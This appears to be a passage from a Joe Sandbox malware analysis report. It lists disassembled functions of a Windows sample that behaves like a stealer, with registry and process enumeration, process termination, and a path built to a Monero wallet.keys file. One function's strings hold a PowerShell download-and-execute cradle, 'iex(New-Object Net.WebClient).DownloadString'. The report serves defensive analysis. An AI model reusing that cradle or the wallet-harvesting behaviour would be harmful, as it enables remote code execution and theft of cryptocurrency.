                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: 2fec212a59976635b5846b81c195659d88218ef0cbe9e0f223a0effa24266703
                                    • Instruction ID: c49ce29e08775137eb7c4698b42892a385aa4634be0225f35f897d8a9fc27d31
                                    • Opcode Fuzzy Hash: 2fec212a59976635b5846b81c195659d88218ef0cbe9e0f223a0effa24266703
                                    • Instruction Fuzzy Hash: 1B310AB4A44218ABDB20DF94DC85BDCB7B5AB48305F5081D8F609A7281CB706FC59F98
                                    Function 0069856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006985B6
                                    • wsprintfA.USER32 ref: 006985E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0069860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0069861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00698629
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                    • RegQueryValueExA.ADVAPI32(00000000,0142D9E0,00000000,000F003F,?,00000400), ref: 0069867C
                                    • lstrlen.KERNEL32(?), ref: 00698691
                                    • RegQueryValueExA.ADVAPI32(00000000,0142D920,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,006A0B3C), ref: 00698729
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00698798
                                    • RegCloseKey.ADVAPI32(00000000), ref: 006987AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: ff73109fee0c83d3be17c6492db10173a9a4f050ab771dbf659755a6983c72ff
                                    • Instruction ID: d943a0e8c4def2b01f2dcdfa2ad31165f378fc4d30879e35d5f87f1db643381a
                                    • Opcode Fuzzy Hash: ff73109fee0c83d3be17c6492db10173a9a4f050ab771dbf659755a6983c72ff
                                    • Instruction Fuzzy Hash: D0211971A1421CAFDB24DB94DC85FE9B3B9FB48701F1081D8E609A6180DF71AA85CFE4
                                    Function 006999A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006999C5
                                    • Process32First.KERNEL32(0068A056,00000128), ref: 006999D9
                                    • Process32Next.KERNEL32(0068A056,00000128), ref: 006999F2
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00699A4E
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00699A6C
                                    • CloseHandle.KERNEL32(00000000), ref: 00699A79
                                    • CloseHandle.KERNEL32(0068A056), ref: 00699A88
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: dea0c91be69cc9834c4bf64cfb0d00500174e7eb966b14478d53734389145095
                                    • Instruction ID: 37692b2f74b8c216cc022e55914741fe68d655bcfd212bf2f706c4b5b942e80d
                                    • Opcode Fuzzy Hash: dea0c91be69cc9834c4bf64cfb0d00500174e7eb966b14478d53734389145095
                                    • Instruction Fuzzy Hash: 2921EA71918218ABDF25DFA6DC89BEDB7B9FB48301F1041C8E509A6290D7749F84DF60
                                    Function 00697820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697834
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0069783B
                                    • RegOpenKeyExA.ADVAPI32(80000002,0141BA48,00000000,00020119,00000000), ref: 0069786D
                                    • RegQueryValueExA.ADVAPI32(00000000,0142DA40,00000000,00000000,?,000000FF), ref: 0069788E
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00697898
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: edf595e265050375c02601a632d060299002ddd3cfbaf69c7944dcefd6ff8d17
                                    • Instruction ID: 1ccd9af29bfe349be7d16c496f2f29c27fdc64fcdbbc94cbac69368bad9da099
                                    • Opcode Fuzzy Hash: edf595e265050375c02601a632d060299002ddd3cfbaf69c7944dcefd6ff8d17
                                    • Instruction Fuzzy Hash: 9C01F475A5C305BBEB00DBE5ED49F6EB77DEB44701F104198F61597290D6709A00DB50
                                    Function 006978B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006978C4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 006978CB
                                    • RegOpenKeyExA.ADVAPI32(80000002,0141BA48,00000000,00020119,00697849), ref: 006978EB
                                    • RegQueryValueExA.ADVAPI32(00697849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0069790A
                                    • RegCloseKey.ADVAPI32(00697849), ref: 00697914
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: d0570f730ff592bf5a417b8b22e1a8e411c806ae6e9aa22b0987bbb6c9c5ffca
                                    • Instruction ID: a453b65ee0f6bb7778118a8708cb51b5b80d6e2a1eda7da63cf204f2d813165d
                                    • Opcode Fuzzy Hash: d0570f730ff592bf5a417b8b22e1a8e411c806ae6e9aa22b0987bbb6c9c5ffca
                                    • Instruction Fuzzy Hash: 1401F4B5A58309BFEB00DBE5EC49FAEB77CEB44701F104595F615A7281DB705A00DB90
                                    Function 00699470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(>=i,80000000,00000003,00000000,00000003,00000080,00000000,?,00693D3E,?), ref: 0069948C
                                    • GetFileSizeEx.KERNEL32(000000FF,>=i), ref: 006994A9
                                    • CloseHandle.KERNEL32(000000FF), ref: 006994B7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID: >=i$>=i
                                    • API String ID: 1378416451-383082895
                                    • Opcode ID: caf22b8c4691937f37506f88f4838088f42b01e037e0f8f62479076fe908898e
                                    • Instruction ID: d958f22f6fed5d9b94a8045324f543e10412161b4fd395a8e9758ddb63bafcb8
                                    • Opcode Fuzzy Hash: caf22b8c4691937f37506f88f4838088f42b01e037e0f8f62479076fe908898e
                                    • Instruction Fuzzy Hash: 56F03135E18308BBDF10DBF5EC49F9EB7BAAB48711F108558FA11A7280D670A6019F60
                                    Function 0068A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0068A13C
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0068A161
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0068A181
                                    • ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 0068A1AA
                                    • LocalFree.KERNEL32(0068148F), ref: 0068A1E0
                                    • CloseHandle.KERNEL32(000000FF), ref: 0068A1EA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: e9da395a8ebf4ab8479a48e599bd3eaeb7349b40c3fafcbe1d1e3fa90f053ac9
                                    • Instruction ID: 72866be42a076ede7e368cfc04a2b34cf95b43e8cbf9e96ab1654f4abac68370
                                    • Opcode Fuzzy Hash: e9da395a8ebf4ab8479a48e599bd3eaeb7349b40c3fafcbe1d1e3fa90f053ac9
                                    • Instruction Fuzzy Hash: 28312F74A04209EFDB14DFE5D849BEEB7B6BF48301F108159E911A7390D774AA81CFA1
                                    Function 006949D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcat.KERNEL32(?,0142DD70), ref: 00694A2B
                                      • Part of subcall function 00698F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00694A51
                                    • lstrcat.KERNEL32(?,?), ref: 00694A70
                                    • lstrcat.KERNEL32(?,?), ref: 00694A84
                                    • lstrcat.KERNEL32(?,0141B310), ref: 00694A97
                                    • lstrcat.KERNEL32(?,?), ref: 00694AAB
                                    • lstrcat.KERNEL32(?,0142D0B8), ref: 00694ABF
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 00698F20: GetFileAttributesA.KERNEL32(00000000,?,00681B94,?,?,006A577C,?,?,006A0E22), ref: 00698F2F
                                      • Part of subcall function 006947C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006947D0
                                      • Part of subcall function 006947C0: RtlAllocateHeap.NTDLL(00000000), ref: 006947D7
                                      • Part of subcall function 006947C0: wsprintfA.USER32 ref: 006947F6
                                      • Part of subcall function 006947C0: FindFirstFileA.KERNEL32(?,?), ref: 0069480D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: 6f9d5a08442fdc77ae8b9e21096c50d4ee65324e1f09659586a763e64d637761
                                    • Instruction ID: 55f5a6c477b9a15892c480b8db485a5202918d94adfd50ed1a84ca773c8eeedb
                                    • Opcode Fuzzy Hash: 6f9d5a08442fdc77ae8b9e21096c50d4ee65324e1f09659586a763e64d637761
                                    • Instruction Fuzzy Hash: 86319CF2900208ABCF54FBB0DC86EED733DAB58300F44468DB21596495EE74A7C9CB98
                                    Function 00692EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00692FD5
                                    Strings
                                    • <, xrefs: 00692F89
                                    • ')", xrefs: 00692F03
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00692F54
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00692F14
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 2c39b07a522f667bc6db2257759d936badd44ac45e3b99f75fe7728785c94ea2
                                    • Instruction ID: 72b14635f5a216d263a3cd14b4785f926e92fbd7e9671e647be41c1f51df3226
                                    • Opcode Fuzzy Hash: 2c39b07a522f667bc6db2257759d936badd44ac45e3b99f75fe7728785c94ea2
                                    • Instruction Fuzzy Hash: 5A41FC719102089ADF54FBE0C8A2BEDB7BEAF14300F40455DE006AB596DF702A4ACFD9
                                    Function 00694300 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,0142D118,00000000,00020119,?), ref: 00694344
                                    • RegQueryValueExA.ADVAPI32(?,0142DC68,00000000,00000000,00000000,000000FF), ref: 00694368
                                    • RegCloseKey.ADVAPI32(?), ref: 00694372
                                    • lstrcat.KERNEL32(?,00000000), ref: 00694397
                                    • lstrcat.KERNEL32(?,0142DCB0), ref: 006943AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
